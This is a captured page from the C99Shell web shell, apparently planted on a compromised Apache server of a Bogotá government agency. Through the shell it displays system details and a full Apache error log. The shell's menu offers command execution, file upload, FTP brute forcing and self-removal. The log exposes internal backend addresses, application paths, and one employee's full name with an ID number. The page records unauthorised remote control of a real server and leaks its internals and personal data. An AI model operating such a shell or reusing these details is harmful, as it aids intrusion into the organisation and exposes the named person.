!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 8.02 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2017.01.24.log (29.04 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Tue Jan 24 02:05:35.300586 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Jan 24 02:51:15.227998 2017] [proxy:error] [pid 7252:tid 14756] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Tue Jan 24 02:51:15.227998 2017] [proxy:error] [pid 7252:tid 14756] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Tue Jan 24 02:51:15.227998 2017] [proxy_http:error] [pid 7252:tid 14756] [client 152.61.128.50:34286] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Tue Jan 24 02:51:15.415199 2017] [proxy:error] [pid 7252:tid 14756] AH00940: HTTP: disabled connection for (172.22.1.51)
[Tue Jan 24 02:51:15.602399 2017] [proxy:error] [pid 7252:tid 14756] AH00940: HTTP: disabled connection for (172.22.1.51)
[Tue Jan 24 04:20:29.877003 2017] [ssl:error] [pid 7252:tid 12708] AH02032: Hostname 190.27.245.106 provided via SNI and hostname dama.gov.co provided via HTTP are different
[Tue Jan 24 04:25:54.466774 2017] [core:error] [pid 7252:tid 14676] (20024)The given path is misformatted or contained invalid characters: [client 37.187.56.66:52978] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Tue Jan 24 05:11:18.622558 2017] [proxy_http:error] [pid 7252:tid 15024] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.82.143.31:49333] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=10628
[Tue Jan 24 05:55:14.060987 2017] [cgi:error] [pid 7252:tid 13108] [client 136.243.36.97:53979] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/knowledge_base.asp
[Tue Jan 24 05:55:25.121407 2017] [cgi:error] [pid 7252:tid 13108] [client 136.243.36.97:44334] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/manuals.asp
[Tue Jan 24 05:55:32.406619 2017] [cgi:error] [pid 7252:tid 14452] [client 136.243.36.97:46612] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/service_techo.asp
[Tue Jan 24 05:55:38.958631 2017] [cgi:error] [pid 7252:tid 14452] [client 136.243.36.97:48267] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:55:45.869443 2017] [cgi:error] [pid 7252:tid 14656] [client 136.243.36.97:50546] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:55:58.786266 2017] [cgi:error] [pid 7252:tid 13108] [client 136.243.36.97:54775] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:56:06.180679 2017] [cgi:error] [pid 7252:tid 15204] [client 136.243.36.97:57238] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:56:17.303498 2017] [cgi:error] [pid 7252:tid 15204] [client 136.243.36.97:60941] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:56:28.083117 2017] [cgi:error] [pid 7252:tid 15204] [client 136.243.36.97:36326] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:56:34.525929 2017] [cgi:error] [pid 7252:tid 15112] [client 136.243.36.97:38493] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:56:45.196347 2017] [cgi:error] [pid 7252:tid 14656] [client 136.243.36.97:41880] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:56:53.573562 2017] [cgi:error] [pid 7252:tid 15204] [client 136.243.36.97:44431] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:57:02.153577 2017] [cgi:error] [pid 7252:tid 13108] [client 136.243.36.97:47203] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:57:14.103198 2017] [cgi:error] [pid 7252:tid 14656] [client 136.243.36.97:50797] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:57:28.002823 2017] [cgi:error] [pid 7252:tid 15112] [client 136.243.36.97:55133] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:57:34.726434 2017] [cgi:error] [pid 7252:tid 14452] [client 136.243.36.97:57258] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:57:44.039651 2017] [cgi:error] [pid 7252:tid 13108] [client 136.243.36.97:60539] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:57:53.930068 2017] [cgi:error] [pid 7252:tid 14452] [client 136.243.36.97:36601] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:58:04.694087 2017] [cgi:error] [pid 7252:tid 14656] [client 136.243.36.97:40779] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:58:13.773303 2017] [cgi:error] [pid 7252:tid 14460] [client 136.243.36.97:43739] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:58:23.336120 2017] [cgi:error] [pid 7252:tid 14460] [client 136.243.36.97:47076] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:58:29.357730 2017] [cgi:error] [pid 7252:tid 14460] [client 136.243.36.97:49125] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:58:39.856549 2017] [cgi:error] [pid 7252:tid 14676] [client 136.243.36.97:52517] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:58:49.122965 2017] [cgi:error] [pid 7252:tid 14452] [client 136.243.36.97:55344] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/show_products_class.asp
[Tue Jan 24 05:58:55.581376 2017] [cgi:error] [pid 7252:tid 12404] [client 136.243.36.97:57476] script not found or unable to stat: E:/nuevo/htdocs/BLA/resoluciones/software_updates.asp
[Tue Jan 24 05:59:33.458243 2017] [core:error] [pid 7252:tid 14756] (20024)The given path is misformatted or contained invalid characters: [client 136.243.36.97:43542] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Tue Jan 24 07:20:34.817781 2017] [core:error] [pid 7252:tid 14452] (20024)The given path is misformatted or contained invalid characters: [client 37.187.56.66:45426] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Tue Jan 24 07:42:59.260343 2017] [proxy_http:error] [pid 7252:tid 13108] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:29603] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=7
[Tue Jan 24 07:42:59.260343 2017] [proxy:error] [pid 7252:tid 13108] [client 201.245.192.253:29603] AH00898: Error reading from remote server returned by /isolucionsda/BarraTitulos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=7
[Tue Jan 24 08:06:34.479229 2017] [proxy_http:error] [pid 7252:tid 15584] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:19093] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Tue Jan 24 08:06:34.479229 2017] [proxy:error] [pid 7252:tid 15584] [client 201.245.192.253:19093] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Tue Jan 24 08:37:00.619436 2017] [proxy_http:error] [pid 7252:tid 12420] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:11153] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Jan 24 08:37:00.619436 2017] [proxy:error] [pid 7252:tid 12420] [client 201.245.192.253:11153] AH00898: Error reading from remote server returned by /isolucionsda/Menu.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Jan 24 08:37:00.650636 2017] [proxy_http:error] [pid 7252:tid 15968] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:11154] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Jan 24 08:37:00.650636 2017] [proxy:error] [pid 7252:tid 15968] [client 201.245.192.253:11154] AH00898: Error reading from remote server returned by /isolucionsda/BarraTitulos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Jan 24 08:38:06.654352 2017] [proxy_http:error] [pid 7252:tid 13048] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:13330] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/FrameSetVistaPrevia.asp?Articulo=F/Flujogramadelprocedimiento126PA05-PR07_v5/Flujogramadelprocedimiento126PA05-PR07_v5.asp&Id_Articulo=10623
[Tue Jan 24 08:38:06.654352 2017] [proxy:error] [pid 7252:tid 13048] [client 201.245.192.253:13330] AH00898: Error reading from remote server returned by /ISOlucionSDA/BancoConocimiento/F/Flujogramadelprocedimiento126PA05-PR07_v5/Flujogramadelprocedimiento126PA05-PR07_v5.asp, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/FrameSetVistaPrevia.asp?Articulo=F/Flujogramadelprocedimiento126PA05-PR07_v5/Flujogramadelprocedimiento126PA05-PR07_v5.asp&Id_Articulo=10623
[Tue Jan 24 09:12:16.997153 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Jan 24 10:01:34.030147 2017] [proxy_http:error] [pid 7252:tid 12556] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:22635] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Jan 24 10:01:34.030147 2017] [proxy:error] [pid 7252:tid 12556] [client 201.245.192.253:22635] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Jan 24 10:01:35.543350 2017] [proxy_http:error] [pid 7252:tid 14944] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:23459] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Jan 24 10:16:29.019319 2017] [proxy_http:error] [pid 7252:tid 12436] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:10640] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Jan 24 10:16:29.019319 2017] [proxy:error] [pid 7252:tid 12436] [client 201.245.192.253:10640] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Jan 24 10:29:31.767294 2017] [proxy_http:error] [pid 7252:tid 16032] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:29199] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Session.asp
[Tue Jan 24 10:29:31.767294 2017] [proxy:error] [pid 7252:tid 16032] [client 201.245.192.253:29199] AH00898: Error reading from remote server returned by /isolucionsda/SesionNeutra.asp, referer: http://190.27.245.106/isolucionsda/Session.asp
[Tue Jan 24 10:32:53.132448 2017] [proxy_http:error] [pid 7252:tid 12532] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:27261] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Jan 24 10:40:48.714883 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Jan 24 10:47:55.968433 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Jan 24 10:51:31.763612 2017] [proxy_http:error] [pid 7252:tid 14976] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:16210] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Jan 24 10:51:31.763612 2017] [proxy:error] [pid 7252:tid 14976] [client 201.245.192.253:16210] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Jan 24 10:51:31.763612 2017] [proxy_http:error] [pid 7252:tid 14944] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:16208] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Jan 24 10:51:31.763612 2017] [proxy:error] [pid 7252:tid 14944] [client 201.245.192.253:16208] AH00898: Error reading from remote server returned by /isolucionsda/BarraTitulos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Jan 24 10:51:31.779212 2017] [proxy_http:error] [pid 7252:tid 15916] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:16209] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Jan 24 10:51:31.779212 2017] [proxy:error] [pid 7252:tid 15916] [client 201.245.192.253:16209] AH00898: Error reading from remote server returned by /isolucionsda/Menu.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Jan 24 12:23:00.557253 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Jan 24 12:23:00.557253 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Jan 24 13:09:00.155300 2017] [core:error] [pid 7252:tid 15212] (20024)The given path is misformatted or contained invalid characters: [client 157.55.39.144:22992] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Tue Jan 24 13:25:30.071639 2017] [proxy:error] [pid 7252:tid 12620] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.32:80 (172.22.1.32) failed
[Tue Jan 24 13:25:30.071639 2017] [proxy:error] [pid 7252:tid 12620] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.32) for 60s
[Tue Jan 24 13:25:30.071639 2017] [proxy_http:error] [pid 7252:tid 12620] [client 163.172.65.36:50252] AH01114: HTTP: failed to make connection to backend: 172.22.1.32
[Tue Jan 24 13:59:08.574784 2017] [proxy_http:error] [pid 7252:tid 14624] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:32973] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Tue Jan 24 14:33:01.992556 2017] [core:error] [pid 7252:tid 14780] (20024)The given path is misformatted or contained invalid characters: [client 157.55.39.158:9371] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Tue Jan 24 14:44:29.392163 2017] [proxy_http:error] [pid 7252:tid 14924] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:31866] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Tue Jan 24 14:44:30.094164 2017] [proxy_http:error] [pid 7252:tid 14836] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:33048] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Tue Jan 24 14:44:30.094164 2017] [proxy:error] [pid 7252:tid 14836] [client 201.245.192.253:33048] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraTitulos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Tue Jan 24 15:08:50.413729 2017] [proxy_http:error] [pid 7252:tid 15148] (20014)Internal error: [client 201.245.192.253:31597] AH01102: error reading status line from remote server 172.22.1.43:80, referer: http://190.27.245.106/desprendiblespago/controlador?comando=salir&id=51788576&funcionario=CARMENZA+MIRANDA+CUERVO&desde=51788576&hasta=51788576&version=51788576&salir=Salir
[Tue Jan 24 15:57:14.952631 2017] [proxy_http:error] [pid 7252:tid 13192] (20014)Internal error: [client 201.245.192.253:34349] AH01102: error reading status line from remote server 172.22.1.61:8080, referer: http://190.27.245.106/sipse/faces/autenticacion.xhtml
[Tue Jan 24 15:57:14.952631 2017] [proxy:error] [pid 7252:tid 13192] [client 201.245.192.253:34349] AH00898: Error reading from remote server returned by /sipse/faces/presentacion/workflow/consultarFlujo.xhtml, referer: http://190.27.245.106/sipse/faces/autenticacion.xhtml
[Tue Jan 24 16:23:51.818236 2017] [proxy_http:error] [pid 7252:tid 14460] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 132.255.20.132:54277] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Menu.asp?Pagina=Menu.asp&IdModulo=4
[Tue Jan 24 16:27:20.936603 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Jan 24 17:12:23.423950 2017] [proxy_http:error] [pid 7252:tid 16232] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:19003] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Tue Jan 24 17:12:23.423950 2017] [proxy:error] [pid 7252:tid 16232] [client 201.245.192.253:19003] AH00898: Error reading from remote server returned by /IsolucionSDA/g/Bot_Glosario.jpg, referer: http://190.27.245.106/IsolucionSDA/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Tue Jan 24 17:48:29.956755 2017] [proxy_http:error] [pid 7252:tid 15300] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:31010] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=MagazinHome.asp
[Tue Jan 24 17:50:14.913739 2017] [proxy_http:error] [pid 7252:tid 15148] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:32333] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Tue Jan 24 17:50:14.929339 2017] [proxy_http:error] [pid 7252:tid 12820] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:32331] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Tue Jan 24 17:50:14.944939 2017] [proxy_http:error] [pid 7252:tid 15928] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:32334] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Tue Jan 24 17:53:30.116882 2017] [proxy_http:error] [pid 7252:tid 14972] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:21652] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=9980
[Tue Jan 24 18:14:43.656319 2017] [proxy_http:error] [pid 7252:tid 16064] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 132.255.20.132:62630] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp
[Tue Jan 24 18:14:43.656319 2017] [proxy:error] [pid 7252:tid 16064] [client 132.255.20.132:62630] AH00898: Error reading from remote server returned by /isolucionsda/javascript/ClickValidation.js, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp
[Tue Jan 24 18:14:43.656319 2017] [proxy_http:error] [pid 7252:tid 14836] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 132.255.20.132:62633] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp
[Tue Jan 24 18:14:43.656319 2017] [proxy:error] [pid 7252:tid 14836] [client 132.255.20.132:62633] AH00898: Error reading from remote server returned by /isolucionsda/Administracion/Graficas/vacio1x1.gif, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp
[Tue Jan 24 18:26:28.777558 2017] [proxy_http:error] [pid 7252:tid 14452] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 132.255.20.132:62668] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp
[Tue Jan 24 18:26:28.777558 2017] [proxy:error] [pid 7252:tid 14452] [client 132.255.20.132:62668] AH00898: Error reading from remote server returned by /isolucionsda/Administracion/Graficas/vacio1x1.gif, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp
[Tue Jan 24 18:29:48.161508 2017] [proxy_http:error] [pid 7252:tid 16232] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:10692] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=7
[Tue Jan 24 19:00:57.451391 2017] [proxy_http:error] [pid 7252:tid 12468] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:14400] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Jan 24 19:00:57.451391 2017] [proxy:error] [pid 7252:tid 12468] [client 201.245.192.253:14400] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraTitulos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Jan 24 19:00:57.513791 2017] [proxy_http:error] [pid 7252:tid 14688] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:14402] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Jan 24 19:00:57.513791 2017] [proxy:error] [pid 7252:tid 14688] [client 201.245.192.253:14402] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Jan 24 19:19:30.092145 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Jan 24 19:27:01.588138 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Jan 24 20:23:50.663126 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Jan 24 20:50:52.614575 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Jan 24 20:52:49.677181 2017] [proxy_http:error] [pid 7252:tid 15340] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.146.176.144:65343] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Tue Jan 24 20:52:50.363582 2017] [proxy_http:error] [pid 7252:tid 14972] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.146.176.144:65345] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Jan 24 21:04:48.261243 2017] [proxy_http:error] [pid 7252:tid 15020] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.25.110.192:28205] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=ListadoMaestroDocumentos3.asp
[Tue Jan 24 21:28:35.555550 2017] [proxy_http:error] [pid 7252:tid 14972] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.82.143.31:50213] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/FrameSetVistaPrevia.asp?Articulo=T/Trabajoseguroenespaciosconfinados_v1/Trabajoseguroenespaciosconfinados_v1.asp&Id_Articulo=10637
[Tue Jan 24 21:28:35.555550 2017] [proxy:error] [pid 7252:tid 14972] [client 186.82.143.31:50213] AH00898: Error reading from remote server returned by /ISOlucionSDA/BancoConocimiento/T/Trabajoseguroenespaciosconfinados_v1/Trabajoseguroenespaciosconfinados_v1.asp, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/FrameSetVistaPrevia.asp?Articulo=T/Trabajoseguroenespaciosconfinados_v1/Trabajoseguroenespaciosconfinados_v1.asp&Id_Articulo=10637
[Tue Jan 24 23:51:21.017794 2017] [core:error] [pid 7252:tid 14460] (20024)The given path is misformatted or contained invalid characters: [client 161.18.194.38:65494] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file, referer: http://190.27.245.106/
[Tue Jan 24 23:51:54.729453 2017] [core:error] [pid 7252:tid 14900] (20024)The given path is misformatted or contained invalid characters: [client 161.18.194.38:65503] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file, referer: http://190.27.245.106/
[Tue Jan 24 23:52:11.374683 2017] [core:error] [pid 7252:tid 14900] (20024)The given path is misformatted or contained invalid characters: [client 161.18.194.38:65510] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file, referer: http://190.27.245.106/

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--